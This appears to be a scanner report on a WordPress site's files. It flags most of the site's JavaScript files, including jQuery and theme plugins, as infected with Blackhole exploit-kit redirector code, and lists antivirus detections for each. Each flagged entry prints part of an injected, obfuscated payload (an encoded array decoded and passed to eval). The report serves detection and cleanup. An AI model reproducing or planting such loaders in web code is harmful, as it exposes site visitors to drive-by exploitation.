Request | Server response | Status |
http://www.shauryathebraveheart.org/ | 200 OK Content-Length: 22660 Content-Type: text/html | clean |
http://www.shauryathebraveheart.org/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 4365 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};try{document["b"+"od"+"y"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}cat
... 3297 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Agent-AXQ [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- Dropped:Trojan.JS.Iframe.CTY
- Emsisoft
- Dropped:Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Dropped:Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Dropped:Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- Dropped:Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Dropped:Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 82677 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof
... 85900 bytes are skipped ...","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}/*cbed424741b269c2a30a65c77b1fdd0d*/Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Agent-AXQ [Trj]
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- DrWeb
- Exploit.BlackHole.139
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/plugins/wp-imageflow2/js/imageflowplus.js?ver=3.1.4 | 200 OK Content-Length: 31516 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function imageflowplus(instance) {
this.defaults =
{
conf_autorotate: 'off', conf_autorotatepause: 3000, conf_startimg: 1 };
this.conf_reflection_p = 0.5; this.conf_focus = 4; this.conf_ifp_slider_width = 14; this.conf_ifp_images_cursor = 'pointer'; this.conf_ifp_slider_cursor = 'default';
this.ifp_imageflow2div = 'wpif2_imageflow_' + instance;
this.ifp_loadingdiv = 'wpif2_loading_' + instance;
this
... 28239 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- K7AntiVirus
- Trojan ( c8d8b6b50 )
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- F-Prot
- JS/Blacole.DB
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- Commtouch
- JS/Blacole.DB
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/plugins/content-slide/js/coin-slider.js?ver=3.1.4 | 200 OK Content-Length: 15716 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var params = new Array; var order = new Array; var images = new Array; var links = new Array; var linksTarget = new Array; var titles = new Array; var interval = new Array; var imagePos = new Array; var appInterval = new Array; var squarePos = new Array; var reverse = new Array; $.fn.coinslider= $.fn.CoinSlider = function(options){ init = function(el){ order[el.id] = new Array
... 15512 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/themes/organic_non-profit/js/superfish/superfish.js | 200 OK Content-Length: 7771 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 6832 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Agent-AXQ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- VIPRE
- Trojan.JS.Generic (v)
- AVG
- HTML/Framer
- GData
- Trojan.JS.Iframe.CTY
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/themes/organic_non-profit/js/superfish/hoverIntent.js | 200 OK Content-Length: 7231 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.hoverIntent = function(f,g) { var cfg = { sensitivity: 7, interval: 100, timeout: 0 }; cfg = $.extend(cfg, g ? { over: f, out: g } : f ); var cX, cY, pX, pY; var track = function(ev) { cX = ev.pageX; cY = ev.pageY; }; var compare = function(ev,ob) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivi
... 4885 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- AVG
- HTML/Framer
- Norman
- BlacoleRef.AB
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/themes/organic_non-profit/js/iepngfix_tilebg.js | 200 OK Content-Length: 8229 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var IEPNGFix = window.IEPNGFix || {}; IEPNGFix.tileBG = function(elm, pngSrc, ready) { var data = this.data[elm.uniqueID], elmW = Math.max(elm.clientWidth, elm.scrollWidth), elmH = Math.max(elm.clientHeight, elm.scrollHeight), bgX = elm.currentStyle.backgroundPositionX, bgY = elm.currentStyle.backgroundPositionY, bgR = elm.currentStyle.backgroundRepeat; if (!data.tiles) { data.tiles = { elm: elm, src: '', cache: [], ... 7138 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- K7AntiVirus
- Trojan ( c8d8b6b50 )
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- F-Prot
- JS/Blacole.DB
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- Commtouch
- JS/Blacole.DB
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/wp-content/themes/organic_non-profit/js/tabber.js | 200 OK Content-Length: 19573 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function tabberObj(argsObj) { var arg; this.div = null; this.classMain = "tabber"; this.classMainLive = "tabberlive"; this.classTab = "tabbertab"; this.classTabDefault = "tabbertabdefault"; this.classNav = "tabbernav"; this.classTabHide = "tabbertabhide"; this.classNavActive = "tabberactive"; this.titleElements = ['h2','h3','h4','h5','h6']; this.titleElemen
... 10448 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Decode-ARV [Trj]
- Ad-Aware
- Trojan.JS.Iframe.CTY
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.CTY
- K7AntiVirus
- Trojan ( c8d8b6b50 )
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- Emsisoft
- Trojan.JS.Iframe.CTY (B)
- CAT-QuickHeal
- JS/BlacoleRef.CN
- K7GW
- Exploit ( 04c5592b1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Iframe.CTY
- F-Prot
- JS/Blacole.DB
- AVG
- HTML/Framer
- Norman
- Exploit.AIX
- GData
- Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- Commtouch
- JS/Blacole.DB
- BitDefender
- Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/about/ | 200 OK Content-Length: 16535 Content-Type: text/html | clean |
http://www.shauryathebraveheart.org/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 4843 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 3779 bytes are skipped ...,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-731!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.104
- Avast
- JS:Agent-AXQ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Dropped:Trojan.JS.Iframe.CTY
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- Dropped:Trojan.JS.Iframe.CTY (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Generic
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Dropped:Trojan.JS.Iframe.CTY
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Dropped:Trojan.JS.Iframe.CTY
- VIPRE
- Trojan.JS.Generic (v)
- AVG
- HTML/Framer
- Norman
- BlacoleRef.AB
- GData
- Dropped:Trojan.JS.Iframe.CTY
- Symantec
- JS.Runfore
- BitDefender
- Dropped:Trojan.JS.Iframe.CTY
|
http://www.shauryathebraveheart.org/our-goal/ | 200 OK Content-Length: 16763 Content-Type: text/html | clean |
http://www.shauryathebraveheart.org/our-team/ | 200 OK Content-Length: 15657 Content-Type: text/html | clean |
http://www.shauryathebraveheart.org/blog/ | 200 OK Content-Length: 17783 Content-Type: text/html | clean |
http://www.shauryathebraveheart.org/photo-gallery/ | 200 OK Content-Length: 17235 Content-Type: text/html | clean |